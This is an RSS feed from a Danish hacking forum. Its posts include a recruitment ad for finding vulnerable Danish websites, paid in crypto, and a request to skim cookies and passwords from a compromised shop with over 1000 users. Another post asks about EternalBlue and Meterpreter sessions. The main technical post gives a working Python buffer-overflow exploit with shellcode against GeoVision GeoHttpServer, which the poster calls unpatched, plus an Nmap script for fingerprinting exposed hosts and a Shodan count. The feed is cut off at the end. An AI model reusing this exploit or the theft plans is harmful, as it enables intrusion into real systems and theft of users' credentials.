<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Shellsec - Diskussion]]></title>
		<link>https://www.shellsec.pw/</link>
		<description><![CDATA[Shellsec - https://www.shellsec.pw]]></description>
		<pubDate>Wed, 29 Apr 2026 13:35:32 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Kunne du tænke dig at tjene penge på din hacker-hobby?]]></title>
			<link>https://www.shellsec.pw/traad-kunne-du-taenke-dig-at-tjene-penge-paa</link>
			<pubDate>Sat, 28 Nov 2020 23:05:40 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-kunne-du-taenke-dig-at-tjene-penge-paa</guid>
			<description><![CDATA[Hej dygtige Shellsec folk :<img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
Kunne du være interesseret i et lille arbejde som etisk hacker så læs med her. <br />
Jeg har luret med her på forummet igennem nogle år, men kun af ren interesse. Selvom de ting I diskuterer herinde er meget fasicnerende, har jeg absolut ingen forstand på det. <br />
Til gengæld driver jeg en række online medier og lever af affiliate. I den forbindelse har vi startet et nyt website som skal give et overblik over de bedste webhosts, vpn services, wordpress themes/plugins mv.<br />
Som noget ekstra indhold til den side, vil jeg gerne løbende udgive information om cybersikkerhed, password leaks og lign. Og det er her en af jer dygtige shellsec folk kommer ind i billedet.<br />
Hvis du kunne tænke dig at være vores hacker-ekspert, som kan hjælpe os med at holde overblik over websites i Danmark som får lækker informationer, eller du selv kan sondere det danske internet og finde websites, der har hul i sikkerheden og blot venter på at blive hacket, så hører jeg meget gerne fra dig. Materialet bliver brugt til et dansk værktøj i stil med <a href="https://haveibeenpwned.com/" target="_blank" rel="noopener" class="mycode_url">https://haveibeenpwned.com/</a> (Vi bruger også deres database), og de websites du potentielt måtte find som slækker for sikkerheden, bliver muligvis brugt i månedlige rapporter/artikler. Du kan også hjælpe mig eller vores dygtige content skribenter med baggrundsstof og analyse til artikler som de her <a href="https://www.vpnmentor.com/blog/report-dating-apps-leak/" target="_blank" rel="noopener" class="mycode_url">https://www.vpnmentor.com/blog/report-dating-apps-leak/</a><br />
Jeg forstår at du vil arbejde i baggrunden og 100% anonymt, så betalingen for arbejdet kan uden problemer foregå i kryptovaluta og over en chatforbindelse om Telegram. <br />
Hvad betalingen bliver og hvordan det afregnes har jeg brug for input af dig til, men ordentligt arbejde skal selvfølgelig honoreres. <br />
Skriv til mig på Telegram (@kromik100) eller her på forummet. Håber at høre fra et par af jer!<br />
<hr class="mycode_hr" />
Her er to helt perfekte eksempler på nyheder/materiale som vi godt kunne tænke os at bliver gjort opmærksomme på, når de blev lagt frem i "hacker communtiet"<br />
<br />
<a href="https://www.shellsec.pw/traad-tinglysning-find-cpr-paa-folk-ud-fra" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/traad-tinglysnin...olk-ud-fra</a><br />
<a href="https://www.shellsec.pw/traad-nlparty-dk-dump-1000-gamere-emails-clear" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/traad-nlparty-dk...ails-clear</a>]]></description>
			<content:encoded><![CDATA[Hej dygtige Shellsec folk :<img src="https://www.shellsec.pw/images/smilies/facebook/smile.png" alt="Smile" title="Smile" class="smilie smilie_79" /><br />
Kunne du være interesseret i et lille arbejde som etisk hacker så læs med her. <br />
Jeg har luret med her på forummet igennem nogle år, men kun af ren interesse. Selvom de ting I diskuterer herinde er meget fasicnerende, har jeg absolut ingen forstand på det. <br />
Til gengæld driver jeg en række online medier og lever af affiliate. I den forbindelse har vi startet et nyt website som skal give et overblik over de bedste webhosts, vpn services, wordpress themes/plugins mv.<br />
Som noget ekstra indhold til den side, vil jeg gerne løbende udgive information om cybersikkerhed, password leaks og lign. Og det er her en af jer dygtige shellsec folk kommer ind i billedet.<br />
Hvis du kunne tænke dig at være vores hacker-ekspert, som kan hjælpe os med at holde overblik over websites i Danmark som får lækker informationer, eller du selv kan sondere det danske internet og finde websites, der har hul i sikkerheden og blot venter på at blive hacket, så hører jeg meget gerne fra dig. Materialet bliver brugt til et dansk værktøj i stil med <a href="https://haveibeenpwned.com/" target="_blank" rel="noopener" class="mycode_url">https://haveibeenpwned.com/</a> (Vi bruger også deres database), og de websites du potentielt måtte find som slækker for sikkerheden, bliver muligvis brugt i månedlige rapporter/artikler. Du kan også hjælpe mig eller vores dygtige content skribenter med baggrundsstof og analyse til artikler som de her <a href="https://www.vpnmentor.com/blog/report-dating-apps-leak/" target="_blank" rel="noopener" class="mycode_url">https://www.vpnmentor.com/blog/report-dating-apps-leak/</a><br />
Jeg forstår at du vil arbejde i baggrunden og 100% anonymt, så betalingen for arbejdet kan uden problemer foregå i kryptovaluta og over en chatforbindelse om Telegram. <br />
Hvad betalingen bliver og hvordan det afregnes har jeg brug for input af dig til, men ordentligt arbejde skal selvfølgelig honoreres. <br />
Skriv til mig på Telegram (@kromik100) eller her på forummet. Håber at høre fra et par af jer!<br />
<hr class="mycode_hr" />
Her er to helt perfekte eksempler på nyheder/materiale som vi godt kunne tænke os at bliver gjort opmærksomme på, når de blev lagt frem i "hacker communtiet"<br />
<br />
<a href="https://www.shellsec.pw/traad-tinglysning-find-cpr-paa-folk-ud-fra" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/traad-tinglysnin...olk-ud-fra</a><br />
<a href="https://www.shellsec.pw/traad-nlparty-dk-dump-1000-gamere-emails-clear" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/traad-nlparty-dk...ails-clear</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Venteliste]]></title>
			<link>https://www.shellsec.pw/traad-venteliste--12000</link>
			<pubDate>Sun, 05 Apr 2020 08:36:11 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-venteliste--12000</guid>
			<description><![CDATA[Har brug for hjælp til at komme i toppen på en venteliste...<br />
Dusør]]></description>
			<content:encoded><![CDATA[Har brug for hjælp til at komme i toppen på en venteliste...<br />
Dusør]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[shell to meterpreter ?]]></title>
			<link>https://www.shellsec.pw/traad-shell-to-meterpreter</link>
			<pubDate>Sat, 04 Apr 2020 21:54:18 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-shell-to-meterpreter</guid>
			<description><![CDATA[Jeg sidder  og laver lidt pentesting opgaver og følger en guide, men der er noget jeg undre mig over.<br />
Jeg har en windows 7 maskine som jeg har kørt EternalBlue på og har fået en "Windows shell" tror jeg det hedder.<br />
Opgaven lyder nu at man så bagefter skal lave en "shell to meterpreter", hvilket jeg har gjort, og har nu to sessions.<br />
De to sessions - <a href="https://i.imgur.com/pdrbLe3.png" target="_blank" rel="noopener" class="mycode_url">https://i.imgur.com/pdrbLe3.png</a><br />
Windows session - <a href="https://i.imgur.com/1nCATcw.png" target="_blank" rel="noopener" class="mycode_url">https://i.imgur.com/1nCATcw.png</a><br />
Meterpreter session - <a href="https://i.imgur.com/2FO4dRe.png" target="_blank" rel="noopener" class="mycode_url">https://i.imgur.com/2FO4dRe.png</a><br />
Mit spørgsmål - Hvorfor laver man en Meterpreter session efter sin Windows session ? Er det for at kunne vælge mellem Windows og Linux, alt efter hvad man bedst kan lide når man skal bevæge sig rundt på den computer man angriber ?]]></description>
			<content:encoded><![CDATA[Jeg sidder  og laver lidt pentesting opgaver og følger en guide, men der er noget jeg undre mig over.<br />
Jeg har en windows 7 maskine som jeg har kørt EternalBlue på og har fået en "Windows shell" tror jeg det hedder.<br />
Opgaven lyder nu at man så bagefter skal lave en "shell to meterpreter", hvilket jeg har gjort, og har nu to sessions.<br />
De to sessions - <a href="https://i.imgur.com/pdrbLe3.png" target="_blank" rel="noopener" class="mycode_url">https://i.imgur.com/pdrbLe3.png</a><br />
Windows session - <a href="https://i.imgur.com/1nCATcw.png" target="_blank" rel="noopener" class="mycode_url">https://i.imgur.com/1nCATcw.png</a><br />
Meterpreter session - <a href="https://i.imgur.com/2FO4dRe.png" target="_blank" rel="noopener" class="mycode_url">https://i.imgur.com/2FO4dRe.png</a><br />
Mit spørgsmål - Hvorfor laver man en Meterpreter session efter sin Windows session ? Er det for at kunne vælge mellem Windows og Linux, alt efter hvad man bedst kan lide når man skal bevæge sig rundt på den computer man angriber ?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Aktiedysten 2019]]></title>
			<link>https://www.shellsec.pw/traad-aktiedysten-2019</link>
			<pubDate>Mon, 07 Oct 2019 13:00:31 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-aktiedysten-2019</guid>
			<description><![CDATA[Heeeeeey, Aktiedysten.dk, det kunne være intersant at endelig slå enhedslistens medlem Rune Lund, hvilken anden måde end at vinde aktiedysten. Noget der er intersant ? :)]]></description>
			<content:encoded><![CDATA[Heeeeeey, Aktiedysten.dk, det kunne være intersant at endelig slå enhedslistens medlem Rune Lund, hvilken anden måde end at vinde aktiedysten. Noget der er intersant ? :)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[AutoSploit]]></title>
			<link>https://www.shellsec.pw/traad-autosploit</link>
			<pubDate>Mon, 05 Feb 2018 16:24:12 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-autosploit</guid>
			<description><![CDATA[Nogen her der har prøvet det? Hvad synes I om det?<br />
<br />
Links:<br />
<a href="https://github.com/NullArray/AutoSploit" target="_blank" rel="noopener" class="mycode_url">https://github.com/NullArray/AutoSploit</a><br />
<a href="https://www.version2.dk/artikel/nyt-vaerktoej-goer-hacking-endnu-nemmere-1084283" target="_blank" rel="noopener" class="mycode_url">https://www.version2.dk/artikel/nyt-vaer...re-1084283</a>]]></description>
			<content:encoded><![CDATA[Nogen her der har prøvet det? Hvad synes I om det?<br />
<br />
Links:<br />
<a href="https://github.com/NullArray/AutoSploit" target="_blank" rel="noopener" class="mycode_url">https://github.com/NullArray/AutoSploit</a><br />
<a href="https://www.version2.dk/artikel/nyt-vaerktoej-goer-hacking-endnu-nemmere-1084283" target="_blank" rel="noopener" class="mycode_url">https://www.version2.dk/artikel/nyt-vaer...re-1084283</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[FORESPØRGSEL - IP via email?]]></title>
			<link>https://www.shellsec.pw/traad-forespoergsel-ip-via-email</link>
			<pubDate>Thu, 19 Oct 2017 12:56:59 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-forespoergsel-ip-via-email</guid>
			<description><![CDATA[Hej! <br />
Jeg er i den uheldige situation at jeg er blevet snydt for et større beløb. <br />
Jeg har kun en email adresse og konto nr på manden.<br />
Kan man finde frem til en ip eller endnu bedre information på ham, via en email adresse?<br />
<br />
På forhånd tak!]]></description>
			<content:encoded><![CDATA[Hej! <br />
Jeg er i den uheldige situation at jeg er blevet snydt for et større beløb. <br />
Jeg har kun en email adresse og konto nr på manden.<br />
Kan man finde frem til en ip eller endnu bedre information på ham, via en email adresse?<br />
<br />
På forhånd tak!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Mifare crack.]]></title>
			<link>https://www.shellsec.pw/traad-mifare-crack</link>
			<pubDate>Tue, 03 Oct 2017 08:27:53 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-mifare-crack</guid>
			<description><![CDATA[Hey SS. Jeg er gået igang med et nyt projekt med at cracke diverse mifare kort/chips. Mit mål er at kunne duplikere en chip over på et andet kort. Hvis der er nogen som har prøvet med mifare eller noget lignende må de meget gerne skrive herinde.<br />
Ser frem til at vise mine resultater (hvis det lykkedes).]]></description>
			<content:encoded><![CDATA[Hey SS. Jeg er gået igang med et nyt projekt med at cracke diverse mifare kort/chips. Mit mål er at kunne duplikere en chip over på et andet kort. Hvis der er nogen som har prøvet med mifare eller noget lignende må de meget gerne skrive herinde.<br />
Ser frem til at vise mine resultater (hvis det lykkedes).]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Synonymordbog.dk]]></title>
			<link>https://www.shellsec.pw/traad-synonymordbog-dk</link>
			<pubDate>Tue, 22 Aug 2017 09:30:54 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-synonymordbog-dk</guid>
			<description><![CDATA[Prøv og tag et hurtig kig på <a href="http://www.synonymordbog.dk" target="_blank" rel="noopener" class="mycode_url">http://www.synonymordbog.dk</a>, altså bare forsjovs skyld.<br />
Den er mega godt kodet.]]></description>
			<content:encoded><![CDATA[Prøv og tag et hurtig kig på <a href="http://www.synonymordbog.dk" target="_blank" rel="noopener" class="mycode_url">http://www.synonymordbog.dk</a>, altså bare forsjovs skyld.<br />
Den er mega godt kodet.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[1.000+ brugere, cookie stealing]]></title>
			<link>https://www.shellsec.pw/traad-1-000-brugere-cookie-stealing</link>
			<pubDate>Wed, 05 Jul 2017 14:21:02 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-1-000-brugere-cookie-stealing</guid>
			<description><![CDATA[Hejsa,<br />
Har adgang til et website med over 1000+ brugere der håndterer ordrer og kort transaktioner.<br />
Siden benytter "OpenBizBox" og har adgang til hele admin-panelet.<br />
Jeg kan ændre alt indenfor ordrer osv, men har tænkt mig at stjæle cookies fra folk der besøger siden.<br />
Hvordan gør jeg dette? Kan redigere html.twig templates fra panelet, så jeg burde kunne injecte noget malicious kode her, hvordan foreslår i jeg bærer mig ad?<br />
UPDATE:<br />
Der er en indbygget funktion i OpenBizBox der gør at man kan slå custom javascript scripts til at blive injected på alle sider, til widgets og den slags.<br />
Udfra det burde jeg kunne session hijacke, men det er nederen (kan allerede logge ind på alle folks accounts fra panelet). Hvordan får jeg stjålet koderne? Noget med at ændre login boksen eller noget?]]></description>
			<content:encoded><![CDATA[Hejsa,<br />
Har adgang til et website med over 1000+ brugere der håndterer ordrer og kort transaktioner.<br />
Siden benytter "OpenBizBox" og har adgang til hele admin-panelet.<br />
Jeg kan ændre alt indenfor ordrer osv, men har tænkt mig at stjæle cookies fra folk der besøger siden.<br />
Hvordan gør jeg dette? Kan redigere html.twig templates fra panelet, så jeg burde kunne injecte noget malicious kode her, hvordan foreslår i jeg bærer mig ad?<br />
UPDATE:<br />
Der er en indbygget funktion i OpenBizBox der gør at man kan slå custom javascript scripts til at blive injected på alle sider, til widgets og den slags.<br />
Udfra det burde jeg kunne session hijacke, men det er nederen (kan allerede logge ind på alle folks accounts fra panelet). Hvordan får jeg stjålet koderne? Noget med at ændre login boksen eller noget?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cyber Security Base with F‑Secure]]></title>
			<link>https://www.shellsec.pw/traad-cyber-security-base-with-f%E2%80%91secure</link>
			<pubDate>Tue, 25 Oct 2016 16:00:06 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-cyber-security-base-with-f%E2%80%91secure</guid>
			<description><![CDATA[Var nu ikke helt sikker på hvor den hørte bedst hjemme, så det blev denne sektion.<br />
Det er et nyt og gratis online kursus fra F-Secure og University of Helsinki.<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b">Contents of the course series</span><br />
The course series consists of multiple smaller courses, each centered around a specific theme. These themes include<br />
<ol type="1" class="mycode_list"><li>a brief introduction to cyber security and operational security,<br />
</li>
<li>web software development, types of vulnerabilities that are typical to web software, how such vulnerabilities are discovered and then mitigated, and<br />
</li>
<li>advanced topics such as secure software architectures and cryptography.<br />
</li>
</ol>
There will be a few case studies as well as projects that participants can work on. At the end of the course series, we’ll also organize a friendly competition where participants get to find and fix vulnerabilities within a limited time-frame.<br />
Click the link below to view the course serie’s web page and to start your journey into becoming a cyber security expert!<br />
 <br />
Work load and prerequisites<br />
There will be programming assignments, essays, quizzes and puzzles throughout the courses, and completing a specific part of a course means working and completing most if not all of them. We expect that individuals work some 2-10 hours per week on the courses depending on their background. Some programming background and ICT experience will be very beneficial.<br />
ECTS credits for Finnish residents<br />
If you reside in Finland, you can get a total of 10 ECTS credits for the course from the <a href="https://www.helsinki.fi/en/open-university" target="_blank" rel="noopener" class="mycode_url">Open University of University of Helsinki</a>. Your own school, college or university has the option of accepting these as a part of your studies – you have to, however, ask your local administration whether they will do so. We are looking into the possibility of offering certificates for completion of the course series to all participants as well.<br />
We will start on 25th of October, 2016. A link to the stream / recording of the event (event starting 10AM GMT+3): <a href="https://www.helsinki.fi/fi/unitube/video/20543" target="_blank" rel="noopener" class="mycode_url">https://www.helsinki.fi/fi/unitube/video/20543</a>.</blockquote>
<br />
Link med info: <a href="http://mooc.fi/courses/2016/cybersecurity/" target="_blank" rel="noopener" class="mycode_url">http://mooc.fi/courses/2016/cybersecurity/</a><br />
<br />
Link til materialet: <a href="https://cybersecuritybase.github.io/" target="_blank" rel="noopener" class="mycode_url">https://cybersecuritybase.github.io/</a><br />
<br />
Link til den officielle introduktionsvideo, streamet for 7 timer siden: <a href="https://www.helsinki.fi/fi/unitube/video/87c5d0f3-1e6b-40c6-af08-cd1f2e0f77a2" target="_blank" rel="noopener" class="mycode_url">https://www.helsinki.fi/fi/unitube/video...1f2e0f77a2</a><br />
<br />
Kurset kommer til at strække sig nogle måneder ind i 2017, så det kan ikke binges(endnu).]]></description>
			<content:encoded><![CDATA[Var nu ikke helt sikker på hvor den hørte bedst hjemme, så det blev denne sektion.<br />
Det er et nyt og gratis online kursus fra F-Secure og University of Helsinki.<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b">Contents of the course series</span><br />
The course series consists of multiple smaller courses, each centered around a specific theme. These themes include<br />
<ol type="1" class="mycode_list"><li>a brief introduction to cyber security and operational security,<br />
</li>
<li>web software development, types of vulnerabilities that are typical to web software, how such vulnerabilities are discovered and then mitigated, and<br />
</li>
<li>advanced topics such as secure software architectures and cryptography.<br />
</li>
</ol>
There will be a few case studies as well as projects that participants can work on. At the end of the course series, we’ll also organize a friendly competition where participants get to find and fix vulnerabilities within a limited time-frame.<br />
Click the link below to view the course serie’s web page and to start your journey into becoming a cyber security expert!<br />
 <br />
Work load and prerequisites<br />
There will be programming assignments, essays, quizzes and puzzles throughout the courses, and completing a specific part of a course means working and completing most if not all of them. We expect that individuals work some 2-10 hours per week on the courses depending on their background. Some programming background and ICT experience will be very beneficial.<br />
ECTS credits for Finnish residents<br />
If you reside in Finland, you can get a total of 10 ECTS credits for the course from the <a href="https://www.helsinki.fi/en/open-university" target="_blank" rel="noopener" class="mycode_url">Open University of University of Helsinki</a>. Your own school, college or university has the option of accepting these as a part of your studies – you have to, however, ask your local administration whether they will do so. We are looking into the possibility of offering certificates for completion of the course series to all participants as well.<br />
We will start on 25th of October, 2016. A link to the stream / recording of the event (event starting 10AM GMT+3): <a href="https://www.helsinki.fi/fi/unitube/video/20543" target="_blank" rel="noopener" class="mycode_url">https://www.helsinki.fi/fi/unitube/video/20543</a>.</blockquote>
<br />
Link med info: <a href="http://mooc.fi/courses/2016/cybersecurity/" target="_blank" rel="noopener" class="mycode_url">http://mooc.fi/courses/2016/cybersecurity/</a><br />
<br />
Link til materialet: <a href="https://cybersecuritybase.github.io/" target="_blank" rel="noopener" class="mycode_url">https://cybersecuritybase.github.io/</a><br />
<br />
Link til den officielle introduktionsvideo, streamet for 7 timer siden: <a href="https://www.helsinki.fi/fi/unitube/video/87c5d0f3-1e6b-40c6-af08-cd1f2e0f77a2" target="_blank" rel="noopener" class="mycode_url">https://www.helsinki.fi/fi/unitube/video...1f2e0f77a2</a><br />
<br />
Kurset kommer til at strække sig nogle måneder ind i 2017, så det kan ikke binges(endnu).]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[GeoVision GeoHttpServer SEH-Baseret Buffer Overflow]]></title>
			<link>https://www.shellsec.pw/traad-geovision-geohttpserver-seh-baseret</link>
			<pubDate>Sun, 10 Jul 2016 18:20:27 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-geovision-geohttpserver-seh-baseret</guid>
			<description><![CDATA[Det er ved at være længe siden jeg kiggede dette igennem, og kan derfor næsten intet huske, så lad os gøre det kort.<br />
<br />
I min sidste tråd om GeoVision nævnte jeg følgende: <br />
<blockquote class="mycode_quote"><cite><span> (18-03-2016, 21:06)</span>MalcolmXI Skrev:  <a href="https://www.shellsec.pw/traad-geovision-dvr-uautoriseret-tilfoejelse?pid=32596#pid32596" class="quick_jump"></a></cite>De firmwares der bruger GeoHttpServer er desværre ikke sårbare over for ovenstående fejl, og efter hvad jeg kan se i manualerne, skal de konfigureres med en klient på en Windows-computer. Derfor kan det selvfølgelig stadig ske, at der findes andre fejl (mon ikke).</blockquote><br />
<blockquote class="mycode_quote"><cite><span> (30-03-2016, 19:41)</span>MalcolmXI Skrev:  <a href="https://www.shellsec.pw/traad-geovision-dvr-uautoriseret-tilfoejelse?pid=32923#pid32923" class="quick_jump"></a></cite><span style="font-weight: bold;" class="mycode_b">GeoHttpServer </span>er en ældre sag, og der er fundet <span style="text-decoration: underline;" class="mycode_u">fejl helt tilbage til 2003</span>, men det er også et <span style="font-weight: bold;" class="mycode_b">Utrolig udbredt stykke software</span>, <span style="font-style: italic;" class="mycode_i">så jeg håber lidt på at få tid til at kigge på det, selvom det umiddelbart ser ud til at være en hærdet fætter, men betydeligt færre angrebsvektorer.</span></blockquote><a href="https://www.shellsec.pw/traad-geovision-dvr-uautoriseret-tilfoejelse" target="_blank" rel="noopener" class="mycode_url">https://www.shellsec.pw/traad-geovision-...ilfoejelse</a><br />
<br />
<br />
Det tog ikke mange minutter at finde et Buffer Overflow, som endnu ikke er blevet patched, selvom det er nogle måneder siden jeg kontaktede dem.<br />
Jeg er også ret sikker på jeg ikke er den første til at indberette det, da det er trivielt let at finde, og sårbarheden er tilgængelig allerede Før man logger ind.<br />
<br />
Så vidt jeg husker var der faktisk 3 Overflows, hvor kun denne ene lige præcis overskrev vores exception handler. De 3 forms vi kan injecte er forbundet med 'Change password', 'Login' og 'Forgotten password'-funktionerne. I vores tilfælde er det kun muligt at overskrive den sårbare handler, hvis vi benytter 'Change password'-formen, som, så vidt jeg husker, bruger miljøvariabler til at sende vores form-data til den rigtige funktion i WebcamServer.exe processen.<br />
<br />
Følgende simple eksempel resulterer i en Messagebox med teksten MalcolmXI! :P<br />
<br />
<span style="font-weight: bold;" class="mycode_b">vGeoHttpServer_mbx.py</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite>#!/usr/bin/env python<br />
# -*- coding: utf-8 -*-<br />
# GeoVision GeoHttpServer SEH-Baseret Buffer Overflow<br />
# Bruger sqlite3.dll til at bypasse SafeSEH, ved hjaelp af en POP POP RET instruktion<br />
# nSEH bruger et negativt short jump i vores kontrollerede buffer-omraade, og hopper derefter tilbage til vores MessageBox shellcode.<br />
# Testet på Windows 7/8 x64<br />
# <br />
# Foelgende simple shellcode aabner en MessageBox med foelgende tekst: 'MalcolmXI!'.<br />
# "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c"<br />
# "\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" 30 tegn<br />
<br />
# "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf"<br />
# "\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"<br />
# "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"<br />
# "\x8b\x7c\xaf\xfc\x01\xc7\x68\x58\x49\x21\x01\x68\x63\x6f\x6c\x6d\x68"<br />
# "\x20\x4d\x61\x6c\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7" 83 tegn<br />
<br />
import httplib, sys<br />
<br />
nSEH = "\xEB\xD6\xCC\xCC"<br />
SEH = "\xED\x77\x49\x00"<br />
JumpTilShellcode = "\xE9\x14\xFF\xFF\xFF"<br />
<br />
ShellcodeDel1 = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c"<br />
ShellcodeDel1 += "\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"<br />
<br />
ShellcodeDel2 = "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf"<br />
ShellcodeDel2 += "\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"<br />
ShellcodeDel2 += "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"<br />
ShellcodeDel2 += "\x8b\x7c\xaf\xfc\x01\xc7\x68\x58\x49\x21\x01\x68\x63\x6f\x6c\x6d\x68"<br />
ShellcodeDel2 += "\x20\x4d\x61\x6c\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"<br />
<br />
if len(sys.argv) &gt; 2:<br />
   tIP = sys.argv[1]<br />
   tPort = sys.argv[2]<br />
   print "Sender Exploit"<br />
   httpServ = httplib.HTTPConnection(tIP, tPort)<br />
   httpServ.connect()<br />
   httpServ.request('POST', '/change_password', 'id=' + "\x90" * 38 + ShellcodeDel1 + '&amp;newpwd=' + ShellcodeDel2 + "\xE9\x88" + "\x90" * 114 + JumpTilShellcode + nSEH + SEH)<br />
   httpServ.close()<br />
<br />
if len(sys.argv) &lt;= 2:<br />
   print "Specificer et maal samt en port at forbinde til"<br />
   print "python vGeoHttpServer_mbx.py &lt;localhost&gt; &lt;80&gt;"</blockquote>
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/EWOPAHf.png" alt="[Billede: EWOPAHf.png]" class="mycode_img" /></div>
<br />
Grunden til jeg sender vores shellcode i 2 dele, er for at få nogle ekstra bytes, samt for at mindske antallet af null-bytes, da vi ikke kan komme udenom disse, selv med sikre buffers uden bad chars osv. I realiteten kan vi nøjes med &#36;id eller &#36;newpwd. Man kunne eventuelt også bruge en egg-hunter e. l. <br />
Jeg har kun testet på Windows 7 og 8 x64.<br />
<br />
I skal være velkommen til at tælle i en debugger, men jeg mener vi har ca. 270 bytes at gøre godt med, så det er jo stadig begrænset hvad vi har af muligheder.<br />
<br />
Man kunne også bruge denne shellcode:https://www.exploit-db.com/exploits/39519/<br />
Der passer godt i størrelsen og er null-free.<br />
<br />
Hvis der er nogle 1337 haxXx0rz herinde, så få den lige til at holde op med at crashe. <br />
Jeg går ikke ud fra man kan bruge dette overflow til at opnå et authentication bypass?<br />
<br />
Hvis man vil prøve, kan man:<br />
- Hente og installere GV-VMS fra: <a href="http://www.geovision.com.tw/english/5_8.asp" target="_blank" rel="noopener" class="mycode_url">http://www.geovision.com.tw/english/5_8.asp</a><br />
- Lave en bruger og logge ind<br />
- Starte WebcamServer.exe fra installationsmappen (Selve programmet installerer også en wakelock service)<br />
<br />
Shodan finder selv 59,885 resultater, som dog for nogle måneder siden viste 77K:<br />
<a href="https://www.shodan.io/search?query=GeoHttpServer" target="_blank" rel="noopener" class="mycode_url">https://www.shodan.io/search?query=GeoHttpServer</a><br />
<br />
<br />
Som jeg før har nævnt kan man dog ikke regne med Shodan og Dorks, men i stedet selv skanne ved hjælp af f. eks. Nmap eller Masscan.<br />
Nedenstående Nmap script fra den tidligere tråd fingerprinter denne GeoHttpServer, så det er lige til:<br />
<span style="font-weight: bold;" class="mycode_b">vGeo.nse</span><br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>-- Head --<br />
description = [[GeoVision DVR FW-FP]]<br />
author = "MXI"<br />
<br />
<br />
local shortport = require "shortport"<br />
local http = require "http"<br />
local string = require "string"<br />
<br />
<br />
-- Rule --<br />
portrule = shortport.http<br />
<br />
-- Action --<br />
action = function(host, port)<br />
    <br />
    local index = "/index.htm"<br />
    local uagent = {header={}}<br />
    uagent['header']['User-Agent'] = "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"<br />
    local response = http.get(host, port, index, uagent)<br />
    <br />
    if ( response.status == 200 ) then<br />
        local title = string.match(response.body, "&lt;[Tt][Ii][Tt][Ll][Ee][^&gt;]*&gt;([^&lt;]*)&lt;/[Tt][Ii][Tt][Ll][Ee]&gt;")<br />
                <br />
        if ( title == "GeoVision Inc. - Video Server" ) or ( title ~= "GeoVision Inc." ) then<br />
            return "GeoVision DVR: Saarbar?"<br />
        end    <br />
        <br />
        if ( response.header.server == 'GeoHttpServer' ) then<br />
            if ( title == "Login In" ) then<br />
            return "GeoVision Webcam"<br />
            else<br />
            return "GeoVision Server, men ukendt firmware"<br />
            end<br />
                        <br />
        end<br />
    end<br />
end</code></div></div><br />
Det frække ved denne bundle er, at det:<br />
1) Er Windows computere<br />
2) Er tiltænkt forretninger med et større antal overvågningskameraer<br />
<br />
Nu må vi se om jeg har glemt noget, igen, igen, igen...<br />
<br />
Ps. <br />
Som i kan se, er dette Ikke min stærke side :D]]></description>
			<content:encoded><![CDATA[Det er ved at være længe siden jeg kiggede dette igennem, og kan derfor næsten intet huske, så lad os gøre det kort.<br />
<br />
I min sidste tråd om GeoVision nævnte jeg følgende: <br />
